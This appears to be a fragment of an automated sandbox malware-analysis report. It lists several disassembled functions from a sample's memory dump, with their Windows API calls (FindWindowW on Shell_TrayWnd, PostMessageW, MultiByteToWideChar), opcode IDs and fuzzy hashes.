                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 16958ae60dfe5a4f89967bfcfcbb409e22f8512f820784e3618b8918fcd56f65
                                              • Instruction ID: 5a2cc3e8b30396d829f1e976d4bf93750c914191ab432e051cfdcf23fcc038f6
                                              • Opcode Fuzzy Hash: 16958ae60dfe5a4f89967bfcfcbb409e22f8512f820784e3618b8918fcd56f65
                                              • Instruction Fuzzy Hash: 71F0F9B1A4025EAACB14FBA48C51FFF77BCEF51710F041A19B566B32D6DB60980D8250
                                              Function 00F12CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F12CCB
                                              • PostMessageW.USER32(00000000), ref: 00F12CD2
                                                • Part of subcall function 00EEF1A7: Sleep.KERNEL32 ref: 00EEF21F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 22d5b294271f0c057bb3530d30b5f922d64506bf511c79dedf30c34f40a4e304
                                              • Instruction ID: 9a19a950e2a781f315b6d4c61110d7836251b7990b200188233db1b555597097
                                              • Opcode Fuzzy Hash: 22d5b294271f0c057bb3530d30b5f922d64506bf511c79dedf30c34f40a4e304
                                              • Instruction Fuzzy Hash: 1FD022313C13487BF228B370DC0FFC67A60AB40B00F810811B305AA0C0CAE0A800D688
                                              Function 00F12C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F12C8B
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F12C9E
                                                • Part of subcall function 00EEF1A7: Sleep.KERNEL32 ref: 00EEF21F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: f99393a5308b08377df303e0b6d8073919955c496af70c187131ad8d6a085a59
                                              • Instruction ID: c3019a5ed309daa259b552daaa5f5e93dc076d7fccd1af5d41f9782f0f99ac39
                                              • Opcode Fuzzy Hash: f99393a5308b08377df303e0b6d8073919955c496af70c187131ad8d6a085a59
                                              • Instruction Fuzzy Hash: 51D022353C4348BBF228B370DC0FFC67E60AF40B00F410811B309AA0C0CAE0A800D684
                                              Function 00EBC19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00EBC233
                                              • GetLastError.KERNEL32 ref: 00EBC241
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EBC29C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: 6828b07496b54c2ff732bc4ab9e0e2786b3fd294739c60cb803a8407e30a3ef8
                                              • Instruction ID: c812a3c04f7bdf77257dc61ae72ca928e2f4b2f5d2ed4b03fb4e6759505ac108
                                              • Opcode Fuzzy Hash: 6828b07496b54c2ff732bc4ab9e0e2786b3fd294739c60cb803a8407e30a3ef8
                                              • Instruction Fuzzy Hash: BA41E531608646AFDB218FE5C844AEB7BB5AF4A314F346169FC59BB1B1DB309C01C750